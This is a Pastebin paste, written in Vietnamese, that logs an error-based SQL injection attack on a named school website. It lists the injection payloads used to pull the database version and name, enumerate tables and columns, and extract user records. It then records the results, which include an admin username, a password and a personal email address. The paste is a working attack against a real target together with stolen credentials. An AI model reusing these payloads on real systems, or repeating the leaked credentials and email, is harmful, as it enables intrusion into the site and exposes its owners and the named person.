Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- victim http://thptnguyenthaibinh.edu.vn
- ' and 1=convert(int,@@version))-- - version
- 'and 1=convert(int,db_name()))-- - database
- ' and 1=convert(int,(select top 1 table_name from information_schema.tables)))-- -
- ta thêm where table_name not in('table vừa tìm được') sau chử tables.. để tiềm thêm các table(table bên cạnh)
- (lưu ý) nếu như chưa có table chúng ta cần thì tiếp tục theo vào và nhớ thêm dấu , khi khai thác các table tiếp theo
- -- nhìn kỷ đoạn này nhá ..vì rất là dể quên à--
- 'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('table cần khai thác'))))-- -
- vd như nảy ta ckeck dc tbuser thì thêm vào đó là ('tbuser')
- nếu ta mún khai thác cloum cạnh bên thì thêm and column_name not in ('cái mới vừa được khai thác'))))-- -
- giờ tìm user nhá 'and 1=convert(int,(select top 1 ten from tbuser)))-- -
- -- nhớ kỷ ten và user nha.. ghi theo cái mà ta khai thac được
- version :
- database : dvgtgt_ptthntb
- table:tbDownloadNd
- colum:
- user:admin
- pass:nputntb123'
- email :lequoccong@gmail.com
Add Comment
Please, Sign In to add comment